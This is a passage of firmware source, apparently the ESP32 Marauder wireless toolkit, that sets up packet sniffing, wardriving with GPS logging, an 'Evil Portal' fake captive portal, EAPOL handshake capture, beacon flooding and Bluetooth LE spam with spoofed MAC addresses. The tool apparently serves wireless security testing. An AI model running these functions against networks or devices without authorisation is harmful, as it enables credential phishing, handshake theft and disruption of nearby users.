display_obj.tft.println((String)access_points->size());
#endif
Serial.print("Saved APs:");
Serial.println((String)access_points->size());
}
}
void WiFiScan::RunLoadSSIDList() {
#ifdef HAS_SD
File log_file = sd_obj.getFile("/SSIDs_0.log");
if (!log_file) {
Serial.println("Could not open /SSIDs_0.log");
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println("Could not open /SSIDs_0.log");
#endif
return;
}
while (log_file.available()) {
String line = log_file.readStringUntil('\n'); // Read until newline character
this->addSSID(line);
}
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.print("Loaded SSIDs: ");
display_obj.tft.println((String)ssids->size());
#endif
log_file.close();
Serial.print("Loaded SSIDs: ");
Serial.println((String)ssids->size());
#endif
}
void WiFiScan::RunSaveSSIDList(bool save_as) {
if (save_as) {
sd_obj.removeFile("/SSIDs_0.log");
this->startLog("SSIDs");
for (int i = 0; i < ssids->size(); i++) {
if (i < ssids->size() - 1)
buffer_obj.append(ssids->get(i).essid + "\n");
else
buffer_obj.append(ssids->get(i).essid);
}
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.print("Saved SSIDs: ");
display_obj.tft.println((String)ssids->size());
#endif
Serial.print("Saved SSIDs: ");
Serial.println((String)ssids->size());
}
}
void WiFiScan::RunEvilPortal(uint8_t scan_mode, uint16_t color)
{
startLog("evil_portal");
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(" Evil Portal ",120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_MAGENTA, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
evil_portal_obj.begin(ssids, access_points);
//if (!evil_portal_obj.begin(ssids, access_points)) {
// Serial.println("Could not successfully start EvilPortal. Setting WIFI_SCAN_OFF...");
// this->StartScan(WIFI_SCAN_OFF, TFT_MAGENTA);
// return;
//}
//else
// Serial.println("Setup EvilPortal. Current mode: " + this->currentScanMode);
this->wifi_initialized = true;
initTime = millis();
}
// Function to start running a beacon scan
void WiFiScan::RunAPScan(uint8_t scan_mode, uint16_t color)
{
startPcap("ap");
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
Serial.println(text_table4[9] + (String)access_points->size());
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[44],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
delete access_points;
access_points = new LinkedList<AccessPoint>();
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
//if (scan_mode == WIFI_SCAN_TARGET_AP_FULL)
esp_wifi_set_promiscuous_rx_cb(&apSnifferCallbackFull);
//else
// esp_wifi_set_promiscuous_rx_cb(&apSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
#ifdef HAS_SCREEN
void WiFiScan::RunLvJoinWiFi(uint8_t scan_mode, uint16_t color) {
display_obj.tft.init();
display_obj.tft.setRotation(1);
#ifdef TFT_SHIELD
uint16_t calData[5] = { 391, 3491, 266, 3505, 7 }; // Landscape TFT Shield
Serial.println("Using TFT Shield");
#else if defined(TFT_DIY)
uint16_t calData[5] = { 213, 3469, 320, 3446, 1 }; // Landscape TFT DIY
Serial.println("Using TFT DIY");
#endif
#ifdef HAS_ILI9341
display_obj.tft.setTouch(calData);
#endif
lv_obj_t * scr = lv_cont_create(NULL, NULL);
lv_disp_load_scr(scr);
}
#endif
void WiFiScan::RunClearStations() {
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println(F(text_table4[45]));
display_obj.tft.println(text_table4[46] + (String)this->clearStations());
#else
this->clearStations();
#endif
}
void WiFiScan::RunClearAPs() {
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println(F(text_table4[9]));
display_obj.tft.println(text_table4[10] + (String)this->clearAPs());
display_obj.tft.println(F(text_table4[45]));
display_obj.tft.println(text_table4[46] + (String)this->clearStations());
#else
this->clearAPs();
this->clearStations();
#endif
}
void WiFiScan::RunClearSSIDs() {
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println(F(text_table4[11]));
display_obj.tft.println(text_table4[12] + (String)this->clearSSIDs());
#else
this->clearSSIDs();
#endif
}
void WiFiScan::RunGenerateSSIDs(int count) {
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println(F(text_table4[13]));
display_obj.tft.println(text_table4[14] + (String)this->generateSSIDs());
display_obj.tft.println(text_table4[15] + (String)ssids->size());
#else
this->generateSSIDs(count);
#endif
}
/*void WiFiScan::RunShutdownBLE() {
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.print(F(text_table4[18]));
#endif
if (this->ble_initialized) {
this->shutdownBLE();
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN);
display_obj.tft.println(F("OK"));
#endif
}
else {
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_RED);
display_obj.tft.println(F(text17));
display_obj.tft.println(F(text_table4[19]));
#endif
}
}*/
void WiFiScan::RunGPSInfo() {
#ifdef HAS_GPS
String text=gps_obj.getText();
Serial.println("Refreshing GPS Data on screen...");
#ifdef HAS_SCREEN
// Get screen position ready
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, SCREEN_HEIGHT / 3);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
// Clean up screen first
//display_obj.tft.fillRect(0, 0, 240, STATUS_BAR_WIDTH, STATUSBAR_COLOR);
display_obj.tft.fillRect(0, (SCREEN_HEIGHT / 3) - 6, SCREEN_WIDTH, SCREEN_HEIGHT - ((SCREEN_HEIGHT / 3) - 6), TFT_BLACK);
// Print the GPS data: 3
display_obj.tft.setCursor(0, SCREEN_HEIGHT / 3);
if (gps_obj.getFixStatus())
display_obj.tft.println(" Good Fix: Yes");
else
display_obj.tft.println(" Good Fix: No");
if(text != "") display_obj.tft.println(" Text: " + text);
display_obj.tft.println("Satellites: " + gps_obj.getNumSatsString());
display_obj.tft.println(" Accuracy: " + (String)gps_obj.getAccuracy());
display_obj.tft.println(" Latitude: " + gps_obj.getLat());
display_obj.tft.println(" Longitude: " + gps_obj.getLon());
display_obj.tft.println(" Altitude: " + (String)gps_obj.getAlt());
display_obj.tft.println(" Datetime: " + gps_obj.getDatetime());
#endif
// Display to serial
Serial.println("==== GPS Data ====");
if (gps_obj.getFixStatus())
Serial.println(" Good Fix: Yes");
else
Serial.println(" Good Fix: No");
if(text != "") Serial.println(" Text: " + text);
Serial.println("Satellites: " + gps_obj.getNumSatsString());
Serial.println(" Accuracy: " + (String)gps_obj.getAccuracy());
Serial.println(" Latitude: " + gps_obj.getLat());
Serial.println(" Longitude: " + gps_obj.getLon());
Serial.println(" Altitude: " + (String)gps_obj.getAlt());
Serial.println(" Datetime: " + gps_obj.getDatetime());
#endif
}
void WiFiScan::RunGPSNmea() {
#ifdef HAS_GPS
LinkedList<nmea_sentence_t> *buffer=gps_obj.get_queue();
bool queue_enabled=gps_obj.queue_enabled();
String gxgga = gps_obj.generateGXgga();
String gxrmc = gps_obj.generateGXrmc();
if(!buffer||!queue_enabled)
gps_obj.flush_queue();
#ifndef HAS_SCREEN
else
gps_obj.flush_text();
#else
// Get screen position ready
int offset=100;
if((SCREEN_HEIGHT / 3)<offset)
offset=SCREEN_HEIGHT/3; //for smaller screens
if(offset<(TOP_FIXED_AREA+6))
offset=TOP_FIXED_AREA+6; //absolute minimium
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, offset);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_GREEN);
// Clean up screen first
display_obj.tft.fillRect(0, offset-6, SCREEN_WIDTH, SCREEN_HEIGHT - (offset-6), TFT_BLACK);
#ifdef GPS_NMEA_SCRNLINES
int lines=GPS_NMEA_SCRNLINES;
#else
int lines=TEXT_HEIGHT;
if(lines>((TFT_HEIGHT-offset-BOT_FIXED_AREA)/10))
lines=(TFT_HEIGHT-offset-BOT_FIXED_AREA)/10;
#endif
String text=gps_obj.getText();
if(queue_enabled){
int queue=gps_obj.getTextQueueSize();
if(queue>0){
display_obj.tft.println(gps_obj.getTextQueue());
lines-=queue; //used lines for text display
}
else
if(text != ""){
display_obj.tft.println(text);
lines--;
}
}
else
if(text != ""){
display_obj.tft.println(text);
lines--;
}
#if GPS_NMEA_SCRNWRAP
lines-=((gxgga.length()-1)/STANDARD_FONT_CHAR_LIMIT) + 1;
lines-=((gxrmc.length()-1)/STANDARD_FONT_CHAR_LIMIT) + 1;
display_obj.tft.setTextWrap(GPS_NMEA_SCRNWRAP);
#else
lines-=2; //two self-genned messages
#endif
#endif
if(buffer && queue_enabled){
int size=buffer->size();
if(size){
gps_obj.new_queue();
for(int i=0;i<size;i++){
nmea_sentence_t line=buffer->get(i);
Serial.println(line.sentence);
#ifdef HAS_SCREEN
if(lines>0){
if(line.unparsed){
if(line.type != "" && line.type != "TXT" && line.type != "GGA" && line.type != "RMC"){
int length=line.sentence.length();
if(length){
#if GPS_NMEA_SCRNWRAP
if((((length-1)/STANDARD_FONT_CHAR_LIMIT) + 1)<=lines){
#endif
display_obj.tft.println(line.sentence);
#if GPS_NMEA_SCRNWRAP
lines-=((length-1)/STANDARD_FONT_CHAR_LIMIT) + 1;
#else
lines--;
#endif
#if GPS_NMEA_SCRNWRAP
}
#endif
}
}
}
}
#endif
}
delete buffer;
}
} else {
static String old_nmea_sentence="";
String nmea_sentence=gps_obj.getNmeaNotimp();
if(nmea_sentence != "" && nmea_sentence != old_nmea_sentence){
old_nmea_sentence=nmea_sentence;
Serial.println(nmea_sentence);
}
#ifdef HAS_SCREEN
if(lines>0){
String display_nmea_sentence=gps_obj.getNmeaNotparsed();
int length=display_nmea_sentence.length();
if(length)
#if GPS_NMEA_SCRNWRAP
if((((length-1)/STANDARD_FONT_CHAR_LIMIT) + 1)<=lines)
#endif
display_obj.tft.println(display_nmea_sentence);
}
#endif
}
#ifdef HAS_SCREEN
display_obj.tft.println(gxgga);
display_obj.tft.println(gxrmc);
#if GPS_NMEA_SCRNWRAP
display_obj.tft.setTextWrap(false);
#endif
#endif
gps_obj.sendSentence(Serial, gxgga.c_str());
gps_obj.sendSentence(Serial, gxrmc.c_str());
#endif
}
void WiFiScan::RunInfo()
{
String sta_mac = this->getStaMAC();
String ap_mac = this->getApMAC();
String free_ram = this->freeRAM();
Serial.println(free_ram);
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, SCREEN_HEIGHT / 3);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println(text_table4[20]);
display_obj.tft.println(text_table4[21] + display_obj.version_number);
display_obj.tft.println("Hardware: " + (String)HARDWARE_NAME);
display_obj.tft.println(text_table4[22] + (String)esp_get_idf_version());
#endif
if (this->wsl_bypass_enabled) {
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[23]);
#endif
}
else {
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[24]);
#endif
}
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[25] + sta_mac);
display_obj.tft.println(text_table4[26] + ap_mac);
display_obj.tft.println(text_table4[27] + free_ram);
#endif
#if defined(HAS_SD)
if (sd_obj.supported) {
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[28]);
display_obj.tft.print(text_table4[29]);
display_obj.tft.print(sd_obj.card_sz);
display_obj.tft.println("MB");
#endif
} else {
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[30]);
display_obj.tft.println(text_table4[31]);
#endif
}
#endif
#ifdef HAS_BATTERY
battery_obj.battery_level = battery_obj.getBatteryLevel();
if (battery_obj.i2c_supported) {
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[32]);
display_obj.tft.println(text_table4[33] + (String)battery_obj.battery_level + "%");
#endif
}
else {
#ifdef HAS_SCREEN
display_obj.tft.println(text_table4[34]);
#endif
}
#endif
//#ifdef HAS_SCREEN
// display_obj.tft.println(text_table4[35] + (String)temp_obj.current_temp + " C");
//#endif
}
void WiFiScan::RunPacketMonitor(uint8_t scan_mode, uint16_t color)
{
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
startPcap("packet_monitor");
#ifdef HAS_ILI9341
#ifdef HAS_SCREEN
display_obj.tft.init();
display_obj.tft.setRotation(1);
display_obj.tft.fillScreen(TFT_BLACK);
#endif
#ifdef HAS_SCREEN
#ifdef TFT_SHIELD
uint16_t calData[5] = { 391, 3491, 266, 3505, 7 }; // Landscape TFT Shield
Serial.println("Using TFT Shield");
#else if defined(TFT_DIY)
uint16_t calData[5] = { 213, 3469, 320, 3446, 1 }; // Landscape TFT DIY
Serial.println("Using TFT DIY");
#endif
display_obj.tft.setTouch(calData);
//display_obj.tft.setFreeFont(1);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setTextSize(1);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); // Buttons
display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // color key
delay(10);
display_obj.tftDrawGraphObjects(x_scale); //draw graph objects
display_obj.tftDrawColorKey();
display_obj.tftDrawXScaleButtons(x_scale);
display_obj.tftDrawYScaleButtons(y_scale);
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
#endif
#else
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[38],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
#endif
Serial.println("Running packet scan...");
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&wifiSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
uint32_t initTime = millis();
}
void WiFiScan::RunEapolScan(uint8_t scan_mode, uint16_t color)
{
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
num_eapol = 0;
#ifdef HAS_ILI9341
#ifdef HAS_SCREEN
display_obj.tft.init();
display_obj.tft.setRotation(1);
display_obj.tft.fillScreen(TFT_BLACK);
#endif
startPcap("eapol");
#ifdef HAS_SCREEN
#ifdef TFT_SHIELD
uint16_t calData[5] = { 391, 3491, 266, 3505, 7 }; // Landscape TFT Shield
//Serial.println("Using TFT Shield");
#else if defined(TFT_DIY)
uint16_t calData[5] = { 213, 3469, 320, 3446, 1 }; // Landscape TFT DIY
//Serial.println("Using TFT DIY");
#endif
display_obj.tft.setTouch(calData);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setTextSize(1);
display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); // Buttons
display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // color key
delay(10);
display_obj.tftDrawGraphObjects(x_scale); //draw graph objects
display_obj.tftDrawEapolColorKey();
display_obj.tftDrawChannelScaleButtons(set_channel);
display_obj.tftDrawExitScaleButtons();
#endif
#else
startPcap("eapol");
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[38],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
#endif
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_AP);
esp_err_t err;
wifi_config_t conf;
err = esp_wifi_set_protocol(WIFI_IF_AP, WIFI_PROTOCOL_11B | WIFI_PROTOCOL_11G | WIFI_PROTOCOL_11N | WIFI_PROTOCOL_LR);
if (err != 0)
{
Serial.print("could not set protocol : err=0x");
Serial.println(err, HEX);
}
esp_wifi_get_config((wifi_interface_t)WIFI_IF_AP, &conf);
conf.ap.ssid[0] = '\0';
conf.ap.ssid_len = 0;
conf.ap.channel = this->set_channel;
conf.ap.ssid_hidden = 1;
conf.ap.max_connection = 0;
conf.ap.beacon_interval = 60000;
err = esp_wifi_set_config((wifi_interface_t)WIFI_IF_AP, &conf);
if (err != 0)
{
Serial.print("AP config set error, Maurauder SSID might visible : err=0x");
Serial.println(err, HEX);
}
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
if (scan_mode == WIFI_SCAN_ACTIVE_EAPOL)
esp_wifi_set_promiscuous_rx_cb(&activeEapolSnifferCallback);
else if (scan_mode == WIFI_SCAN_ACTIVE_LIST_EAPOL)
esp_wifi_set_promiscuous_rx_cb(&activeEapolSnifferCallback);
else
esp_wifi_set_promiscuous_rx_cb(&eapolSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
// Function to prepare for beacon mimic
void WiFiScan::RunMimicFlood(uint8_t scan_mode, uint16_t color) {
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(" Mimic Flood ",120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
#endif
packets_sent = 0;
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_AP_STA);
esp_wifi_start();
esp_wifi_set_promiscuous_filter(NULL);
esp_wifi_set_promiscuous(true);
esp_wifi_set_max_tx_power(78);
this->wifi_initialized = true;
initTime = millis();
}
void WiFiScan::RunPwnScan(uint8_t scan_mode, uint16_t color)
{
startPcap("pwnagotchi");
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[37],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&pwnSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
void WiFiScan::executeSourApple() {
#ifdef HAS_BT
NimBLEDevice::init("");
NimBLEServer *pServer = NimBLEDevice::createServer();
pAdvertising = pServer->getAdvertising();
delay(40);
//NimBLEAdvertisementData advertisementData = getOAdvertisementData();
NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Apple);
pAdvertising->setAdvertisementData(advertisementData);
pAdvertising->start();
delay(20);
pAdvertising->stop();
#endif
}
const char* WiFiScan::generateRandomName() {
const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
int len = rand() % 10 + 1; // Generate a random length between 1 and 10
char* randomName = (char*)malloc((len + 1) * sizeof(char)); // Allocate memory for the random name
for (int i = 0; i < len; ++i) {
randomName[i] = charset[rand() % strlen(charset)]; // Select random characters from the charset
}
randomName[len] = '\0'; // Null-terminate the string
return randomName;
}
void WiFiScan::generateRandomMac(uint8_t* mac) {
// Set the locally administered bit and unicast bit for the first byte
mac[0] = 0x02; // The locally administered bit is the second least significant bit
// Generate the rest of the MAC address
for (int i = 1; i < 6; i++) {
mac[i] = random(0, 255);
}
}
void WiFiScan::executeSwiftpairSpam(EBLEPayloadType type) {
#ifdef HAS_BT
uint8_t macAddr[6];
generateRandomMac(macAddr);
esp_base_mac_addr_set(macAddr);
NimBLEDevice::init("");
NimBLEServer *pServer = NimBLEDevice::createServer();
pAdvertising = pServer->getAdvertising();
//NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(type);
pAdvertising->setAdvertisementData(advertisementData);
pAdvertising->start();
delay(10);
pAdvertising->stop();
NimBLEDevice::deinit();
#endif
}
void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
bool do_save;
String display_string;
while (WiFi.scanComplete() == WIFI_SCAN_RUNNING) {
Serial.println("Scan running...");
delay(500);
}
int n = WiFi.scanNetworks(false, true, false, 110, this->set_channel);
if (n > 0) {
for (int i = 0; i < n; i++) {
display_string = "";
do_save = false;
uint8_t *this_bssid_raw = WiFi.BSSID(i);
char this_bssid[18] = {0};
sprintf(this_bssid, "%02X:%02X:%02X:%02X:%02X:%02X", this_bssid_raw[0], this_bssid_raw[1], this_bssid_raw[2], this_bssid_raw[3], this_bssid_raw[4], this_bssid_raw[5]);
if (this->seen_mac(this_bssid_raw))
continue;
this->save_mac(this_bssid_raw);
String ssid = WiFi.SSID(i);
ssid.replace(",","_");
if (ssid != "") {
display_string.concat(ssid);
}
else {
display_string.concat(this_bssid);
}
if (gps_obj.getFixStatus()) {
do_save = true;
display_string.concat(" | Lt: " + gps_obj.getLat());
display_string.concat(" | Ln: " + gps_obj.getLon());
}
else {
display_string.concat(" | GPS: No Fix");
}
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
display_obj.display_buffer->add(display_string);
#endif
String wardrive_line = WiFi.BSSIDstr(i) + "," + ssid + "," + this->security_int_to_string(WiFi.encryptionType(i)) + "," + gps_obj.getDatetime() + "," + (String)WiFi.channel(i) + "," + (String)WiFi.RSSI(i) + "," + gps_obj.getLat() + "," + gps_obj.getLon() + "," + gps_obj.getAlt() + "," + gps_obj.getAccuracy() + ",WIFI\n";
Serial.print((String)this->mac_history_cursor + " | " + wardrive_line);
if (do_save) {
buffer_obj.append(wardrive_line);
}
}
}
this->channelHop();
// Free up that memory, you sexy devil
WiFi.scanDelete();
}
#endif
}
// Function to start running a beacon scan
void WiFiScan::RunBeaconScan(uint8_t scan_mode, uint16_t color)
{
if (scan_mode == WIFI_SCAN_AP)
startPcap("beacon");
else if (scan_mode == WIFI_SCAN_WAR_DRIVE) {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
startLog("wardrive");
String header_line = "WigleWifi-1.4,appRelease=" + (String)MARAUDER_VERSION + ",model=ESP32 Marauder,release=" + (String)MARAUDER_VERSION + ",device=ESP32 Marauder,display=SPI TFT,board=ESP32 Marauder,brand=JustCallMeKoko\nMAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type\n";
buffer_obj.append(header_line);
} else {
return;
}
#else
return;
#endif
}
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
if (scan_mode == WIFI_SCAN_AP)
display_obj.tft.drawCentreString(text_table4[38],120,16,2);
else if (scan_mode == WIFI_SCAN_WAR_DRIVE) {
this->clearMacHistory();
display_obj.tft.drawCentreString("Wardrive", 120, 16, 2);
}
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
if (scan_mode != WIFI_SCAN_WAR_DRIVE) {
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&beaconSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
}
else {
this->startWardriverWiFi();
}
this->wifi_initialized = true;
initTime = millis();
}
void WiFiScan::startWardriverWiFi() {
WiFi.mode(WIFI_STA);
WiFi.disconnect();
}
void WiFiScan::RunStationScan(uint8_t scan_mode, uint16_t color)
{
startPcap("station");
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
